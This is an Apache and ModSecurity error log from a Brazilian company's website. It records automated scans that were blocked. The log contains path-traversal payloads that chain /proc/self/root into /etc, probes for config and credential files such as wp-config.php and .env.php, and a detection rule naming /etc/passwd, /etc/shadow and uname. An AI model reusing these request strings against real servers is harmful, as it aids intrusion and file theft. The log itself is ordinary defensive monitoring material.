https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:04:12.443688 2026] [access_compat:error] [pid 1016:tid 140411666392832] [client 185.177.72.38:38344] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/_phpinfo.php
[Tue Mar 17 10:04:12.770910 2026] [:error] [pid 1016:tid 140411691570944] [client 74.7.244.31:43410] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablRTJqmL8PQht4WJFlMDwAAAUY"]
[Tue Mar 17 10:04:49.548967 2026] [access_compat:error] [pid 18709:tid 140411565680384] [client 185.177.72.38:38878] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/app.py
[Tue Mar 17 10:04:54.399667 2026] [access_compat:error] [pid 2325:tid 140411548894976] [client 185.177.72.38:38964] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/app_dev.php
[Tue Mar 17 10:05:03.499761 2026] [:error] [pid 2159:tid 140411725141760] [client 74.7.241.46:58598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablRf_ct6CQ8jnRyg2p_9QAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:05:03.722684 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.228.16:58088] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablRf64xEDsg_V3ESNY3EQAAAgk"]
[Tue Mar 17 10:05:56.504939 2026] [access_compat:error] [pid 1731:tid 140411557287680] [client 185.177.72.38:39726] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/db.php
[Tue Mar 17 10:06:00.800352 2026] [:error] [pid 18604:tid 140411540502272] [client 74.7.241.46:56098] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablRuEBd0UqwxWindINrwwAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:06:08.830720 2026] [access_compat:error] [pid 1731:tid 140411632822016] [client 185.177.72.38:39932] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/functions.php
[Tue Mar 17 10:06:11.676790 2026] [access_compat:error] [pid 1731:tid 140411641214720] [client 185.177.72.38:39932] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/header.php
[Tue Mar 17 10:06:23.632583 2026] [access_compat:error] [pid 11293:tid 140411540502272] [client 185.177.72.38:40078] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Tue Mar 17 10:06:56.712627 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.241.46:55314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablR8K4xEDsg_V3ESNY3KQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:07:22.593155 2026] [access_compat:error] [pid 2325:tid 140411733534464] [client 185.177.72.38:40886] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/phpinfo.php
[Tue Mar 17 10:07:25.877811 2026] [access_compat:error] [pid 17965:tid 140411641214720] [client 45.232.52.179:49995] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:07:26.006796 2026] [access_compat:error] [pid 18709:tid 140411574073088] [client 115.245.208.51:63017] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:07:28.166996 2026] [access_compat:error] [pid 17965:tid 140411716749056] [client 45.232.52.179:49999] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:07:28.585236 2026] [access_compat:error] [pid 11293:tid 140411666392832] [client 115.245.208.51:63020] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:07:38.930623 2026] [access_compat:error] [pid 17965:tid 140411574073088] [client 185.177.72.38:41068] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/server_info.php
[Tue Mar 17 10:07:40.614754 2026] [access_compat:error] [pid 2325:tid 140411582465792] [client 185.177.72.38:41126] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/settings.py
[Tue Mar 17 10:07:43.676960 2026] [access_compat:error] [pid 11293:tid 140411607643904] [client 185.177.72.38:41162] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sms.py
[Tue Mar 17 10:07:52.920013 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.241.46:58140] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablSKO82sZHvlq4xgHrGggAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:07:53.708501 2026] [access_compat:error] [pid 18604:tid 140411666392832] [client 185.177.72.38:41294] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/test.php
[Tue Mar 17 10:08:14.166155 2026] [core:error] [pid 18380:tid 140411741927168] [client 185.177.72.38:41526] AH10244: invalid URI path (/%home)
[Tue Mar 17 10:08:51.916221 2026] [:error] [pid 18604:tid 140411725141760] [client 74.7.241.46:59788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablSY0Bd0UqwxWindINr2wAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:09:01.979803 2026] [access_compat:error] [pid 18380:tid 140411691570944] [client 128.1.227.246:59105] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:09:02.015310 2026] [access_compat:error] [pid 18709:tid 140411741927168] [client 128.1.227.246:59106] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:09:08.498264 2026] [:error] [pid 18604:tid 140411666392832] [client 185.177.72.38:42280] [client 185.177.72.38] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "127.0.0.1"] [uri "/vuln.php"] [unique_id "ablSdEBd0UqwxWindINr3gAAA0k"]
[Tue Mar 17 10:09:10.191301 2026] [access_compat:error] [pid 2473:tid 140411624429312] [client 185.177.72.38:42282] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/file.php
[Tue Mar 17 10:09:11.373493 2026] [access_compat:error] [pid 2325:tid 140411733534464] [client 128.1.227.246:59494] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:09:11.460003 2026] [access_compat:error] [pid 18604:tid 140411674785536] [client 128.1.227.246:59498] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:09:13.964888 2026] [:error] [pid 18709:tid 140411708356352] [client 74.7.244.31:38086] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablSeTarLhPAjZGI1b2x6AAAA4Q"]
[Tue Mar 17 10:09:28.312189 2026] [access_compat:error] [pid 18380:tid 140411725141760] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/auth.php
[Tue Mar 17 10:09:28.506517 2026] [access_compat:error] [pid 18380:tid 140411616036608] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/session.php
[Tue Mar 17 10:09:28.700289 2026] [access_compat:error] [pid 18380:tid 140411582465792] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/reset.php
[Tue Mar 17 10:09:28.895306 2026] [access_compat:error] [pid 18380:tid 140411708356352] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/forgot.php
[Tue Mar 17 10:09:29.089018 2026] [access_compat:error] [pid 18380:tid 140411683178240] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/password.php
[Tue Mar 17 10:09:29.284640 2026] [access_compat:error] [pid 18380:tid 140411624429312] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/login.php
[Tue Mar 17 10:09:29.478179 2026] [access_compat:error] [pid 18380:tid 140411699963648] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/logout.php
[Tue Mar 17 10:09:29.671700 2026] [access_compat:error] [pid 18380:tid 140411607643904] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/register.php
[Tue Mar 17 10:09:29.865598 2026] [access_compat:error] [pid 18380:tid 140411691570944] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/contact.php
[Tue Mar 17 10:09:31.534556 2026] [access_compat:error] [pid 18380:tid 140411632822016] [client 185.177.72.38:42572] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/api.php
[Tue Mar 17 10:09:34.720699 2026] [access_compat:error] [pid 2473:tid 140411624429312] [client 185.177.72.38:42674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/dev.php
[Tue Mar 17 10:09:36.402059 2026] [access_compat:error] [pid 2473:tid 140411716749056] [client 185.177.72.38:42674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/old.php
[Tue Mar 17 10:09:36.603051 2026] [access_compat:error] [pid 2473:tid 140411683178240] [client 185.177.72.38:42674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/bak.php
[Tue Mar 17 10:09:36.803978 2026] [access_compat:error] [pid 2473:tid 140411548894976] [client 185.177.72.38:42674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/backup.php
[Tue Mar 17 10:09:37.005169 2026] [access_compat:error] [pid 2473:tid 140411699963648] [client 185.177.72.38:42674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/php_test.php
[Tue Mar 17 10:09:37.206000 2026] [access_compat:error] [pid 2473:tid 140411540502272] [client 185.177.72.38:42674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/check.php
[Tue Mar 17 10:09:37.406706 2026] [access_compat:error] [pid 2473:tid 140411574073088] [client 185.177.72.38:42674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/tmp.php
[Tue Mar 17 10:09:42.119356 2026] [access_compat:error] [pid 18380:tid 140411641214720] [client 185.177.72.38:42786] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/adminer.php
[Tue Mar 17 10:09:42.322694 2026] [access_compat:error] [pid 18380:tid 140411674785536] [client 185.177.72.38:42786] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/setup.php
[Tue Mar 17 10:09:50.839745 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.46:59390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablSnqBJNF7axNlVR0UAuwAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:09:51.426058 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.243.203:53780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablSnweiSKl8TjouI-YGRwAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:10:06.573498 2026] [:error] [pid 18380:tid 140411540502272] [client 74.7.243.203:53970] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablSrq4xEDsg_V3ESNY3cwAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:10:24.755622 2026] [access_compat:error] [pid 18709:tid 140411565680384] [client 185.177.72.38:43468] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-config.php
[Tue Mar 17 10:10:38.339799 2026] [access_compat:error] [pid 18604:tid 140411708356352] [client 185.177.72.38:43692] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.php
[Tue Mar 17 10:10:48.637401 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.46:34574] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablS2KBJNF7axNlVR0UAxAAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:11:01.824663 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.243.203:38516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablS5dCmCSWTlPouqorP5QAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:11:08.410540 2026] [:error] [pid 18709:tid 140411624429312] [client 74.7.243.203:47502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablS7DarLhPAjZGI1b2yCgAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:11:24.684215 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.203:47512] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablS_KBJNF7axNlVR0UA3wAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:11:26.087017 2026] [:error] [pid 18380:tid 140411616036608] [client 74.7.243.203:51882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablS_q4xEDsg_V3ESNY3gAAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
